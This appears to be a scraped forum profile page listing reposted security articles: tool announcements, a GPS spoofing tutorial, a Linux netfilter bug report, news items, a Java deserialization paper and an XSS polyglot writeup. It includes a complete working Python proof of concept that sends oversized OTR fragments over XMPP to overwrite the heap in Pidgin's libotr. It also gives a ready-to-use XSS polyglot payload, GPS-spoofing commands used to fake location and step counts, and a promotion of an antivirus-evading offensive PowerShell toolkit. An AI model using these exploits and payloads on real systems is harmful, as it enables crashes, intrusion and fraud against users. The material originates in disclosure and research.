Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18736

  • Joined

  • Last visited

  • Days Won

    711

 Content Type 

Everything posted by Nytro

  1. Nytro

    BinExport

    Nytro posted a topic in Programe utile

    BinExport Copyright 2011-2016 Google Inc. Disclaimer: This is not an official Google product (experimental or otherwise), it is just code that happens to be owned by Google. Introduction BinExport is the exporter component of the BinNavi project. It is a plugin for the commercial IDA Pro disassembler and exports disassemblies into the PostgreSQL database format that BinNavi requires. A previous version (zynamics_binexport_8) also ships with BinDiff, serving a similar purpose. This repository contains the complete source code necessary to build the IDA Pro plugin for Linux, Windows and OS X. Installation Download the binaries from the release page and copy them into the IDA Pro plugins directory. These are the default paths: OS Plugin path Linux /opt/ida-6.9/plugins OS X /Applications/IDA Pro 6.9/idabin/plugins Windows %ProgramFiles(x86)%\IDA 6.9\plugins Note (Windows only): Due to the way the BinExport build works currently, you also have to copy the PostgreSQL client libray and SSL libraries to the IDA installation directory. See The "Build BinExport" section below. Sursa: https://github.com/google/binexport
  2. Nytro
    GPS hacking (PART 1) Author: virustracker Time: February 4, 2016 Category: default Author: Kevin2600 From: http://drops.wooyun.org/tips/11155 0x00 Preface GPS hacking has alway been a hot topic on security conferences over the past few years. But the contents are over academic and the cost for necessary equipment is too high, which stops many fans from getting started. The appearance of some open source projects, such as GPS-SDR-SIM, and the Keynote speech given by @Wang Kang on Blackhat Europe 2015 have pierced the veil of GPS. This means any user who is interested in this topic will truly be able to have a try on GPS hacking. I believe many of you have heard of a powerful tool called Software Defined Radio (SDR) in GPS research. But a new USRP is very expensive, until we found an amazing TV Dongle named RTL-SDR. Some time ago, everyone enjoys using it to watch “adult channels”. In view of its hardware constraints, it can only be used to received data. However, HackRF and BladeRF support both receiving and sending data, besides they are cheaper than USRP. Of course, HackRF and BladeRF support different frequency and sample rate. Therefore, this two become the first choice of radio fans. The most important part about BladeRF is that it is full duplexed. Here is a comparison between several SDR equipment. You may purchase as you need. Brief introduction of GPS system GPS system is very complex and involve many fields from satellite communications. Here is just a brief introduction. The GPS we are talking about is built by U.S. Department of Defense. Currently there are 31 satellites working simultaneously in space. Normally we need at least 4 satellites to complete triangulation positioning. All satellites broadcast both L1 signals for civil use and L2 signals for military use at the same time. What we often use is a 1575.42MHz ultra high frequency which is an unencrypted L1 signals for civil use. GPS signals include 3 kinds of information. Pseudorandom code: a simple ID code used to identify each satellite. Ephemeris data: include information about the time and status of satellites, which plays an important role in calculating the position of each satellite. Almanac data: include information about satellite orbits and the specific position that a satellite will be at in a given time. 0x01 Processes to forge BladeRF GPS signals 1.1 Install a BladeRF tool on Ubuntu 14.04.3 install the header file install BladeRF firmware & FPGA image After installation, you may notice a hostedX40.rbf and a bladerf_fw.img in /usr/share/nuand/BladeRF/. Here you can insert the BladeRF to a USB interface. Normally system will automatically load the FPGA image. Or it can be manually loaded by inputingbladerf_cli -l /path/hostedX40.rbf in command line. When the image is loaded successfully, 3 LED lights on BladeRF board will illuminate, meanwhile, we can add a -p parameter to further verify if system installation is successful. 1.2 Install GPS-SDR-SIM git clone https://github.com/osqzss/gps-sdr-sim.git cd gps-sdr-sim gcc gpssim.c -lm -O3 -o gps-sdr-sim Set up latitude and longitude, then generate a data sample. Note that the I/O baseband signal here is 16. Afterwards, gps-sdr-sim will generate data files with latitude and longitude data in a automatic way. Then we will be able to send the forged GPS data through bladerf_cli. 1.3 Running time issue of GPS-SDR-SIM In practical test, @Wangwang find that GPS simulator can only work continuously for five minutes by default. By viewing its source code, we realized this problem is caused by default settings of the program. The program is designed to use less hard drive space and will only generate 300-second data by default. We could modify its parameter to extend working time. But data of 15 minutes will be up to 5GB. 0x02 Forge GPS signals in practice @Wangwang has shared several practical test cases here. Whoever is interested may have a try. 2.1 Search for girls through Wechat People Nearby I heard that a lot of programmers have little time to hang out with their queen in heart due to working pressure and introvert personality. And Wechat People Nearby perfectly solves this problem for people like that. All you need is to turn on the GPS of your phone, then you’ll have a change to say hello to the girls near by. But the drawback is the maximum range is limited within dozen miles away. For those kings of emotion, the stage is too small. Here @Wangwang presents the first case on forging GPS signals-search girls through Wechat People Nearby. Rumor says a campaign held several days ago in Sanya, Hainan gathered a town of beauties. @Wangwang can’t help but wonder how they look like. Let’s try Wechat people nearby! Before sending the forged GPS coordinate, @Wangwang only got the girls in the same city. Then @Wangwang started to send the forge GPS coordinate. 5 minutes later, the girls in Sanya turned up. LOL…@Wangwang signed a tech geek can change his life. 2.2 Forge Nike+ step counts Many friends who are found of mobile security must have read a post called “using AnDroid Hook to cheat Wechat sports” (http://drops.wooyun.org/tips/8416) written by @Zheng Mi. In this post, he mentioned that he used Android Hook to cheat on step counts so that to beat his friends’ record. But this method needs you to root your phone and install some relevant cheating plugins. For other step counting software, these plugins require to be modified accordingly. Here the test target is Nike+ Running. Let’s see a video first. This video is expedited to save time. http://player.youku.com/player.php/sid/XMTQwMzAxMTk4OA==/v.swf By browsing the home page of GPS-SDR-SIM, we learn that the forged GPS latitude and longitude data can be static or dynamic. To succeed in simulating motion trail, we have to forge dynamic GPS latitude and longitude data, which can be completed by the following parameters. gps-sdr-sim -e brdc3540.14n -u circle.csv -b 16 As you can see, step counting App-Nike+ is fooled through directly forging GPS signals. You’ll be the top scorer even you are in bed. But, of course, @Wangwang wish you could really join in running and enjoy the joy of sports. 2.3 Range test on forge signals From the aforementioned experiments, we know that GPS receiver can accept software simulated signals within a short distance. Then what about the performance of the GPS receiver in a larger scale? How far does effective distance can reach? Of course, it connects with output power, antenna gain and signal interference from nearby signals. So @Wangwang only presents a simple indoor test here. Actual condition prevails. Please watch this video first. http://player.youku.com/player.php/sid/XMTQwMzAwNzMxNg==/v.swf As can be seen from the video, the latitude and longitude of the GPS receiver is successfully changed in a 25-meter long linear corridor without any obstacles. Normally, real GPS signals coming from 20,000 meters high are already weak, and almost no signal is detected indoors. Therefore, indoor GPS signals forging attack can be pretty effective. 0x03 Summaries Based on the above cases, I believe you have more or less learned something about forging GPS signals. But as far as GPS itself, this is a very funny and esoteric area. More GPS related products emerge in market and each will respond different towards GPS deceiving attacks. Everybody can use your imagination and try different tricks. Finally, I’d like to extend my thanks to @osqzss, @Wang Kang and countless GNURadio enthusiasts for their unselfish sharing. It’s because of them that we’ll have chance to experience the charm of software defined radio. I recommend you the home page of GPS-SDR-SIM Project and the presentation given by @Wang Kang on Blackhat. Those who have HackRF equipment can read the post “Hijack GPS positioning & hijack WIFI positioning” by @lxj616. 0x04 References http://drops.wooyun.org/tips/10580 https://github.com/osqzss/gps-sdr-sim https://en.wikipedia.org/wiki/GPS_signals “Time and Position Spoofing with Open Source Projects” Kang Wang http://www.taylorkillian.com/2013/08/sdr-showdown-hackrf-vs-bladerf-vs-usrp.html Sursa: http://en.wooyun.io/2016/02/04/41.html
      • 2
      • Upvote
  3. Nytro
    Linux netfilter IPT_SO_SET_REPLACE memory corruption A memory corruption vulnerability exists in the IPT_SO_SET_REPLACE ioctl in the netfilter code for iptables support. This ioctl is can be triggered by an unprivileged user on PF_INET sockets when unprivileged user namespaces are available (CONFIG_USER_NS=y). Android does not enable this option, but desktop/server distributions and Chrome OS will commonly enable this to allow for containers support or sandboxing. In the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it is possible for a user-supplied ipt_entry structure to have a large next_offset field. This field is not bounds checked prior to writing a counter value at the supplied offset: newpos = pos + e->next_offset; ... e = (struct ipt_entry *) (entry0 + newpos); e->counters.pcnt = pos; This means that an out of bounds 32-bit write can occur in a 64kb range from the allocated heap entry, with a controlled offset and a partially controlled write value ("pos") or zero. The attached proof-of-concept (netfilter_setsockopt_v3.c) triggers the corruption multiple times to set adjacent heap structures to zero. This issue affects (at least) kernel versions 3.10, 3.18 and 4.4. It appears that a similar codepath is accessible via arp_tables.c/ARPT_SO_SET_REPLACE as well. Furthermore, a recent refactoring cof this codepath (https://github.com/torvalds/linux/commit/2e4e6a17af35be359cc8f1c924f8f198fbd478cc) introduced an integer overflow in xt_alloc_table_info, which on 32-bit systems can lead to small structure allocation and a copy_from_user based heap corruption. The attached proof-of-concept (netfilter_setsockopt_v4.c) triggers this issue on 4.4. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. netfilter_setsockopt_v3.c 2.0 KB Download netfilter_setsockopt_v4.c 1.3 KB Download Sursa: https://code.google.com/p/google-security-research/issues/detail?id=758
  4. Nytro
    Caution Urged over Patched Windows USB Driver Flaw by Michael Mimoso March 9, 2016 , 2:07 pm USB-related vulnerabilities make people nervous; you need look no further than Stuxnet and BadUSB to see the dangers associated with infected portable storage devices and peripherals. Yesterday, Microsoft patched a flaw in the Windows USB Mass Storage Class Driver that could put some people on edge. Though the flaw was rated “important,” likely because it requires local access to exploit, previous work in this arena shows that such a bug could be attacked remotely. Andy Davis of NCC Group in the U.K. privately disclosed the flaw, CVE-2016-0133, to Microsoft. His recent research includes a focus on USB bugs that are no longer limited to local exploits. For Black Hat Asia 2014, for example, Davis released a paper explaining techniques that could allow an attacker to take advantage of RDP and RemoteFX USB redirection features in Windows. Davis, who could not be reached for comment on yesterday’s patch, said in his paper that organizations should disable RemoteFX on clients and servers, use granular RemoteFX security controls, and pay attention to “local” USB vulnerabilities. The one patched yesterday, Microsoft said, can be used to elevate privileges on a compromised machine by an attacker inserting a malicious USB drive into a vulnerable computer. Microsoft said the driver in question fails to properly validate objects in memory. “An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode,” Microsoft said in its advisory. “An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” Craig Young, a researcher at Tripwire, said the vulnerability likely could be exploited even on a locked workstation. “Based on the description from Microsoft, insertion of the crafted USB stick would be enough to exploit vulnerable code within the mass storage driver without any further user-interaction,” Young said. “The flaw may exist within code responsible for low-level device access as opposed to higher-level filesystem related activities and these activities should take place regardless of whether there is an interactive logon session at the console.” Stuxnet, which was used to disrupt Iran’s nuclear program in 2009, spread via infected USB drives, primarily to attack air-gapped machines that the attackers could not reach with any of the zero-day exploits at their disposal. Stuxnet exploited a vulnerability in LNK files, which define shortcuts to files or directories; Windows allows them to use custom icons from control panel files (.CPL). In Windows, those icons are loaded from modules, either executables or DLLs; CPLs are DLLs. An attacker is able to then define which executable module would be loaded, and use the .LNK file to execute arbitrary code inside of the Windows shell. “In contrast, the LNK vulnerability exploited by Stuxnet and patched in MS10-046 would require that a victim browse to a malicious folder to trigger code execution,” Young said. Making this vulnerability even more angst-ridden is the kernel access it affords because it’s a driver vulnerability. This gives an attacker a direct path to code execution within the kernel rather than in context of a logged in user, Young said. “Execution within the kernel means that an attacker can hide their tracks, gain persistent access, and dump password hashes or security tokens left on the system,” Young said, who added that based on public information, there may not be any limitations to the payload associated with an exploit of this flaw. “This issue generally presents a large risk in any environment where someone has physical access to a USB port of someone else’s system. For example, I regularly see that medical offices will leave patients in a room with a PC containing private health information and that many retail locations have PCs for sales people to check inventory or prepare sales quotes,” Young said. “At a larger scale, Windows based data centers could also be heavily affected if server racks are not locked to make USB ports inaccessible to employees or anyone else who makes it into the data center.” Sursa: https://threatpost.com/caution-urged-over-patched-windows-usb-driver-flaw/116683/
  5. Nytro
    Microsoft has released a Debian Linux switch OS. Repeat, a Debian Linux switch operating system Open-source toolkit for wrangling networks 9 Mar 2016 at 18:00, Chris Williams OCP Summit Put down your coffee gently. Microsoft has today released a homegrown open-source operating system, based on Debian GNU/Linux, that runs on network switches. The software is dubbed SONiC, aka Software for Open Networking in the Cloud. It's a toolkit of code and kernel patches to bend switch hardware to your will, so you can dictate how it works and what it can do, rather than relying on proprietary firmware from a traditional networking vendor. It also pits Redmond against white-box network operating systems from the likes of HP, Dell, and Cumulus Networks. SONiC builds upon the Windows giant's Linux-based Azure Cloud Switch (ACS) operating system that we learned about in September. ACS is the brains of switches in Microsoft's Azure cloud: the code can run on all sorts of hardware from different equipment makers, and uses a common C API – the Switch Abstraction Interface (SAI) – to program the specialist chips in the networking gear. This means ACS can control and manage network devices and implement features as required regardless of who made the underlying electronics. This underlying hardware must therefore implement the SAI, an API that Microsoft contributed to theOpen Compute Project (OCP) in 2015. The OCP, launched by Facebook in 2011, encourages hardware manufacturers to produce generic gear to the project's open standards and specifications so large organizations can buy the machines cheaply in bulk and use software to customize and control the gear as they wish. Redmond – backed by Arista, Broadcom, Dell and Mellanox – now hopes to contribute ACS's sibling SONiC to the OCP so organizations can pick and choose their switch hardware and shape their networks as needed using Redmond's software. "SONiC is a collection of software networking components required to build network devices like switches," said Azure CTO Mark Russinovich, who will give a keynote at the OCP Summit in San Jose, California, in the next few minutes. "Together with SAI, SONiC will enable cloud operators to take advantage of hardware innovation, while giving them a framework to build upon open source code for applications on the network switch. "We believe it’s the final piece of the puzzle in delivering a fully open sourced switch platform that can share the same software stack across hardware from multiple switch vendors." SONiC is available for download now from Microsoft's Azure GitHub repo under a mix of open-source licenses including the GNU GPL and the Apache license. Today's news follows Microsoft's other bombshell this week: a port of SQL Server for Linux, due out in 2017. This is all extremely surprising given the Windows giant was hell bent on destroying Linux until very recently. Now, according to Russinovich, more than 25 per cent of virtual machines running on Azure are Linux-powered, up from 20 per cent six months ago. Redmond fans insist their favorite IT giant has turned a new leaf, that it no longer likens open-source to cancer and communism, and that it now truly loves Linux. Those of us who found themselves on the business end of Microsoft in the 1990s will be thinking of the old words from a nearly forgotten age. Embrace. Extend... ® Updated to add Russinovich has blogged about SONiC here. Meanwhile, Microsoft has said it "has no plans to sell SONiC to customers or provide any network engineering or development support." It also stressed that "SONiC is a collection of networking software components required to have a fully functional L3 device that can be agnostic of any particular Linux distribution. Today SONiC runs on Debian." Sursa: http://www.theregister.co.uk/2016/03/09/microsoft_sonic_debian/
  6. Nytro
    The perils of Java deserialization alvaro_munoz on ‎03-04-2016 12:43 PM Java provides a mechanism called object serialization, which allows an object to be represented as a sequence of bytes that includes the object's data as well as information about the object's type and the types of data stored in the object. The sequence of bytes can be used to deserialize the object graph by using the type information and bytes that represent the object and its data to recreate the object in memory. Java serialization is used by applications for multiple purposes; furthermore, Java serialization is not only used explicitly in application code. It is also used behind the scenes in many known and popular protocols. Security issues with Java deserialization have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collections). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic, and other products, and the details were disclosed publically with no previous notification to vendors. The security community focused on exploring these issues, and as a result mitigation advice was published describing various ways to protect against this kind of attack. Understanding where and why Java serialization is used in your applications, libraries, and frameworks will greatly help you to design an architecture to prevent this kind of attack. While it is possible (although not always easy) to protect the cases in which Java serialization is explicitly used in your application code, the cases in which it is used by frameworks and libraries may require additional security controls, as we document in this paper. In our paper, we review the basics of the Java deserialization process and explain how and why it becomes vulnerable. We will show how different Java classes – referred to as gadgets throughout the paper – can be abused by attackers during the deserialization process to compromise or attack applications and servers. We explain how attackers can leverage these gadget classes for their own purposes. We examine several remote code execution gadgets to show how these attacks chain multiple pieces of code to craft the malicious payload. We review available mitigation advice and present a new technique to bypass some of the recommended protections. Finally, we conclude by reviewing how the problem affects similar libraries, and wrap up by offering our own mitigation strategies to more effectively protect against this problem. Paper: HPE-SR whitepaper java deserialization RSA2016.pdf ‏2580 KB Sursa: http://community.hpe.com/t5/Security-Research/The-perils-of-Java-deserialization/ba-p/6838995#.VuE1pfl96Ul
      • 1
      • Upvote
  7. Nytro
    Qubes OS 3.1 has been released! Mar 9, 2016 by Joanna Rutkowska in Announcements I’m happy to announce that today we’re releasing Qubes OS 3.1! The major new architectural feature of this release has been the introduction of the Qubes Management infrastructure, which is based on the popular Salt management software. In Qubes 3.1, this management stack makes it possible to conveniently control system-wide Qubes configuration using centralized, declarative statements. Declarative is the key word here: it makes creating advanced configurations significantly simpler. (The user or administrator needs only to specify what they want to get, rather than how they want to get it). This has already allowed us to improve our installation wizard (firstboot) so that it now offers the user the ability to easily select from various options to pre-create some useful configurations, such as Whonix or USB-hosting VMs. Currently, the management stack is limited to dom0 and system-wide Qubes configuration (i.e. what VMs should be present, with what properties, how connected), and notably missing is the ability to configure/manage states inside the VMs or templates (e.g. what packages are to be installed, or what additional services are to be enabled in the VMs). I think most readers will understand very well that marrying powerful and flexible, yet very complex, management software such as Salt, with a security-focused system like Qubes OS is an extremely sensitive task. This is because we really would not like to negate all the isolation we have previously worked hard to build, obviously. Yet, we have recently come up with – what we believe is – an elegant way to also extend our management stack to cover VMs’ internal states. In fact, we already have working code for this and plan on introducing this feature officially in the upcoming Qubes 4.0 release candidate. We might also decide to bring it to the 3.1 release (as an optional update), in case we can’t release 4.0-rc1 soon enough. Once we introduce this missing piece of the Qubes management infrastructure, we will gain almost limitless possibilities for shaping Qubes configurations to fit particular user groups’ needs and for delivering them easily. Besides the management stack, there have been a number of other improvements and bugfixes introduced in 3.1 compared to Qubes 3.0, and most of these have already been mentioned in the original 3.1-rc1 announcement post. To name here just two which might be of critical importance to some users (as they significantly improve hardware compatibility): Qubes 3.1 now supports UEFI-based boot, as well as many new GPUs, thanks to the updated drivers and kernel in Dom0. The ISO can be downloaded here. As usual, we encourage people to verify the integrity of the downloaded images as explained here. Existing users of the 3.0 and 3.1-rcX releases should be able to easily upgrade without re-installing. Enjoy! Sursa: https://www.qubes-os.org/news/2016/03/09/qubes-os-3-1-has-been-released/
  8. Nytro
    PoC libotr heap overwrite on Pidgin #!/usr/bin/python -u # ### PoC libotr heap overwrite on Pidgin ### 2016-02-17 Markus Vervier ### X41 D-Sec GmbH ### initial code taken from pyxmpp examples (echobot.py) ### PoC was tested using a standard Prosody XMPP-Server on Arch-Linux allowing 20MB sized messages by default (and even larger) ### On a loopback interface the exploit took several minutes, ### using XMPP stream compression this could be reduced massively ### pyxmpp does not support it ### We used XMPP connections without TLS to not further complicate the setup ### USAGE ### ### Prerequisite: 2 Jabber Accounts (attacker, victim), set Ressource of attacker to "attacktest" ### 1. Initiate an encrypted session from attacker-account to victim-account (e.g. using pidgin) ### 2. Disconnect the attacker account ### 3. Fire up this script and let it connect with the attacker account credentials ### 4. Send a message from victim to attacker ### 5. Wait until message sending is complete, pidgin should crash ### !!! Steps 2-5 (and especially user interaction) are only necessary for this PoC ### !!! If we would implement full OTR in this script we could send the bad message directly ### !!! For easier PoC we now wait until an encrypted message is received to get the correct instance tags import sys import logging import locale import codecs import os, signal import time import base64 def ignore_signal_pipe(signum, frame): print 'signal pipe caught -- IGNORING' signal.signal(signal.SIGPIPE, ignore_signal_pipe) from struct import * from pyxmpp.all import JID,Iq,Presence,Message,StreamError from pyxmpp.jabber.client import JabberClient from pyxmpp.interface import implements from pyxmpp.interfaces import * from pyxmpp.streamtls import TLSSettings from enum import Enum class EchoHandler(object): """Provides the actual 'echo' functionality. Handlers for presence and message stanzas are implemented here. """ implements(IMessageHandlersProvider, IPresenceHandlersProvider) def __init__(self, client): """Just remember who created this.""" self.client = client def get_message_handlers(self): """Return list of (message_type, message_handler) tuples. The handlers returned will be called when matching message is received in a client session.""" return [ ("normal", self.message), ] def get_presence_handlers(self): """Return list of (presence_type, presence_handler) tuples. The handlers returned will be called when matching presence stanza is received in a client session.""" return [ (None, self.presence), ("unavailable", self.presence), ("subscribe", self.presence_control), ("subscribed", self.presence_control), ("unsubscribe", self.presence_control), ("unsubscribed", self.presence_control), ] def message(self,stanza): """Message handler for the component. Echoes the message back if its type is not 'error' or 'headline', also sets own presence status to the message body. Please note that all message types but 'error' will be passed to the handler for 'normal' message unless some dedicated handler process them. :returns: `True` to indicate, that the stanza should not be processed any further.""" subject=stanza.get_subject() body=stanza.get_body() t=stanza.get_type() m = 0 print u'Message from %s received.' % (unicode(stanza.get_from(),)), if subject: print u'Subject: "%s".' % (subject,), if body: print u'Body: "%s".' % (body,), if t: print u'Type: "%s".' % (t,) else: print u'Type: "normal".' if stanza.get_type()=="headline": # 'headline' messages should never be replied to return True # record instance tag if body[:9] == u'?OTR:AAMD': (self.instance_tag, self.our_tag) = self.parse_aamc(body[len("?OTR:AAMD"):]) print "parsed instance tag: %s and our tag %s" % (self.instance_tag.encode("hex"), self.our_tag.encode("hex") ) self.send_insane_otr(stanza, 1024*1024*20, self.instance_tag, self.our_tag) return m def b64maxlen(self, chars): return 1 + (4 * chars / 3) def parse_aamc(self, msg): maxlen = self.b64maxlen(8) # 4 byte integer print "maxlen %u" % (maxlen) tmp = msg[0:maxlen] padding = "" if maxlen % 4 > 1: padding = "="*(4-(maxlen % 4)) tmp += padding print "decoding: "+tmp packed = base64.b64decode(tmp) # return unpack("I", packed[0:4]) return (packed[0:4], packed[4:8]) # their tag, our tag def initial_body(self, instance_tag, our_tag): ret = "?OTR:AAMD"; raw = b'' print "packing initial block with instance tag: %s and our tag: %s" % (instance_tag.encode("hex"), our_tag.encode("hex")) #dirty hack raw += our_tag # sender_nstance_id raw += instance_tag # receiver_id raw += "D" # dummy flags raw += pack("I", 0x1) # sender key id raw += pack("I", 0x2) # recipient key id raw += pack("!I", 10) # len next_y raw += "B"*10 # next_y # we don't know how mpi works but it seems ok ;) raw += "12345678" # reveal sig dummy # yeah overflow! raw += pack("I", 0xFFFFFFFF); # datalen ret += base64.b64encode(raw+"A"*(57-len(raw))) return ret def send_insane_otr(self, stanza, frag_size, instance_tag, our_tag): print "G-FUNK!" # this should result in about 0xFFFFFFFF times "A" base64 encoded len_msg = 5726623060 # fix frag size for base64 frag_size = (frag_size / 4) * 4 frag_msg = "QUFB"*(frag_size / 4) n = len_msg / frag_size # does not evenly divide? if len_msg % frag_size > 0: n += 1 k = 1 n += 1 # initialbody adds another frame initialbody = "?OTR,%hu,%hu,%s," % (k , n , self.initial_body(instance_tag, our_tag)) print "first fragment: "+initialbody m = Message( to_jid=stanza.get_from(), from_jid=stanza.get_to(), stanza_type=stanza.get_type(), subject="foo", body=initialbody) self.client.stream.send(m) k += 1 print "frag size: %s, len_msg: %u, num_frags: %u" % (frag_size, len_msg, n) cur_pos = 0 while(cur_pos < len_msg): body = "?OTR,%hu,%hu,%s," % (k , n , frag_msg) m = Message( to_jid=stanza.get_from(), from_jid=stanza.get_to(), stanza_type=stanza.get_type(), subject="foo", body=body) print "cur_pos %u of %u" % (cur_pos, len_msg) self.client.stream.send(m) k += 1 cur_pos = frag_size * (k-2) time.sleep(0.9) print "FINAL FRAG: cur_pos %u of %u" % (cur_pos, len_msg) def presence(self,stanza): """Handle 'available' (without 'type') and 'unavailable' <presence/>.""" msg=u"%s has become " % (stanza.get_from()) t=stanza.get_type() if t=="unavailable": msg+=u"unavailable" else: msg+=u"available" show=stanza.get_show() if show: msg+=u"(%s)" % (show,) status=stanza.get_status() if status: msg+=u": "+status print msg def presence_control(self,stanza): """Handle subscription control <presence/> stanzas -- acknowledge them.""" msg=unicode(stanza.get_from()) t=stanza.get_type() if t=="subscribe": msg+=u" has requested presence subscription." elif t=="subscribed": msg+=u" has accepted our presence subscription request." elif t=="unsubscribe": msg+=u" has canceled his subscription of our." elif t=="unsubscribed": msg+=u" has canceled our subscription of his presence." print msg return stanza.make_accept_response() class VersionHandler(object): """Provides handler for a version query. This class will answer version query and announce 'jabber:iq:version' namespace in the client's disco#info results.""" implements(IIqHandlersProvider, IFeaturesProvider) def __init__(self, client): """Just remember who created this.""" self.client = client def get_features(self): """Return namespace which should the client include in its reply to a disco#info query.""" return ["jabber:iq:version"] def get_iq_get_handlers(self): """Return list of tuples (element_name, namespace, handler) describing handlers of <iq type='get'/> stanzas""" return [ ("query", "jabber:iq:version", self.get_version), ] def get_iq_set_handlers(self): """Return empty list, as this class provides no <iq type='set'/> stanza handler.""" return [] def get_version(self,iq): """Handler for jabber:iq:version queries. jabber:iq:version queries are not supported directly by PyXMPP, so the XML node is accessed directly through the libxml2 API. This should be used very carefully!""" iq=iq.make_result_response() q=iq.new_query("jabber:iq:version") q.newTextChild(q.ns(),"name","Echo component") q.newTextChild(q.ns(),"version","1.0") return iq class Client(JabberClient): """Simple bot (client) example. Uses `pyxmpp.jabber.client.JabberClient` class as base. That class provides basic stream setup (including authentication) and Service Discovery server. It also does server address and port discovery based on the JID provided.""" def __init__(self, jid, password, tls_cacerts): # if bare JID is provided add a resource -- it is required if not jid.resource: jid=JID(jid.node, jid.domain, "attacktest") if tls_cacerts: if tls_cacerts == 'tls_noverify': tls_settings = TLSSettings(require = True, verify_peer = False) else: tls_settings = TLSSettings(require = True, cacert_file = tls_cacerts) else: tls_settings = None # setup client with provided connection information # and identity data JabberClient.__init__(self, jid, password, disco_name="PyXMPP example: echo bot", disco_type="bot", tls_settings = tls_settings) # add the separate components self.interface_providers = [ VersionHandler(self), EchoHandler(self), ] def stream_state_changed(self,state,arg): """This one is called when the state of stream connecting the component to a server changes. This will usually be used to let the user know what is going on.""" print "*** State changed: %s %r ***" % (state,arg) def print_roster_item(self,item): if item.name: name=item.name else: name=u"" print (u'%s "%s" subscription=%s groups=%s' % (unicode(item.jid), name, item.subscription, u",".join(item.groups)) ) def roster_updated(self,item=None): if not item: print u"My roster:" for item in self.roster.get_items(): self.print_roster_item(item) return print u"Roster item updated:" self.print_roster_item(item) # XMPP protocol is Unicode-based to properly display data received # _must_ convert it to local encoding or UnicodeException may be raised locale.setlocale(locale.LC_CTYPE, "") encoding = locale.getlocale()[1] if not encoding: encoding = "us-ascii" sys.stdout = codecs.getwriter(encoding)(sys.stdout, errors = "replace") sys.stderr = codecs.getwriter(encoding)(sys.stderr, errors = "replace") # PyXMPP uses `logging` module for its debug output # applications should set it up as needed logger = logging.getLogger() logger.addHandler(logging.StreamHandler()) logger.setLevel(logging.INFO) # change to DEBUG for higher verbosity if len(sys.argv) < 3: print u"Usage:" print "\t%s JID password ['tls_noverify'|cacert_file]" % (sys.argv[0],) print "example:" print "\t%s test@localhost verysecret" % (sys.argv[0],) sys.exit(1) print u"creating client..." c=Client(JID(sys.argv[1]), sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else None) print u"connecting..." c.connect() print u"looping..." try: # Component class provides basic "main loop" for the applitation # Though, most applications would need to have their own loop and call # component.stream.loop_iter() from it whenever an event on # component.stream.fileno() occurs. c.loop(1) except IOError, e: if e.errno == errno.EPIPE: # IGNORE EPIPE error print "PIPE ERROR -- IGNORING" else: pass except KeyboardInterrupt: print u"disconnecting..." c.disconnect() print u"exiting..." # vi: sts=4 et sw=4 Sursa: https://raw.githubusercontent.com/x41sec/advisories/master/X41-2016-001/otr-heap-overflow-poc.py
  9. Nytro
    Da, dar exista si avantajul ca daca tie ca angajat nu iti place, iti iei jucariile si pleci fara probleme.
  10. Nytro
    DET (extensible) Data Exfiltration Toolkit DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. The idea was to create a generic toolkit to plug any kind of protocol/service. Slides DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Soon. Link: https://github.com/sensepost/DET
  11. Nytro
    Unleashing an Ultimate XSS Polyglot Ahmed Elsobky Foreground: When it comes to testing for cross-site scripting vulnerabilities (a.k.a. XSS), you’re generally faced with a variety of injection contexts where each of which requires you to alter your injection payload so it suites the specific context at hand. This can be too tedious and time consuming in most cases, but luckily, XSS polyglots can come in handy here to save us a lot of time and effort. What is an XSS polyglot? An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form. So, what polyglot you came up with? jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e Anatomy of the polyglot (in a nutshell): jaVasCript:: A label in ECMAScript; a URI scheme otherwise. /*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; a literal-breaker sequence. (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis! //%0D%0A%0D%0A//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers. </stYle/</titLe/</teXtarEa/</scRipt/--!>: A sneaky HTML-tag-breaker sequence. \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element!! Total length: 144 characters. Link: https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
      • 2
      • Upvote
  12. Nytro
    Bypassing Local Windows Authentication To Defeat Full Disk Encryption
  13. Nytro
    Introducing PS>Attack I’ve been a huge PowerShell fan ever since I first discovered it as a Systems Administrator many years ago. It’s an incredibly easy to use, intuitive and powerful language and helped me efficiently address a lot of tasks that came across my plate. Unfortunately, the other Systems Administrators that I worked with were less keen to pick it up. Years of pointing and clicking had made them nervous about using a command line. For different reasons, the Information Security community is in a similar state. PowerShell is an incredible platform for both offense and defense. There is a lot of cutting edge work being done by members of the PowerShell community, but the Information Security community at large is unaware of a lot of their contributions. This may stem from a lack of interest in Windows development or fear of having to learn yet another scripting language. No matter the reason, a lot of security professionals are missing out on some great work. ENTER PS>ATTACK To help make using offensive PowerShell easier, I’ve created PS>Attack. PS>Attack is a custom made console that is designed to emulate PowerShell and enhance it. Built into PS>Attack are over 110 offensive PowerShell commands representing some of the greatest work going on in the offensive PowerShell community. This selection of tools runs the entire gamut of a security assessment including Reconnaissance, Privilege Escalation, Backdoors and Data Exfiltration. It also includes a custom command called “get-attack” which helps to serve as an attack search engine. It takes a word or phrase and returns a list of commands and their descriptions that match what you’re looking for. Get-Attack returning a list of commands related to the word “Password” All of this is bundled into a single executable that runs on anything from a fresh install of Windows 7 all the way up to a fully patched version of Windows 10. There’s no installer, just double click and start attacking. NOT JUST FOR THE LAB In creating PS>Attack, I didn’t want to create a tool that was only used in a lab environment. I wanted to create something that was useful and could find its way into a penetration tester’s bag of tricks. To this end, PS>Attack is designed to evade antivirus and other hurdles. The various scripts and payloads that provide the commands are encrypted before being embedded into the executable. When PS>Attack is run, these scripts 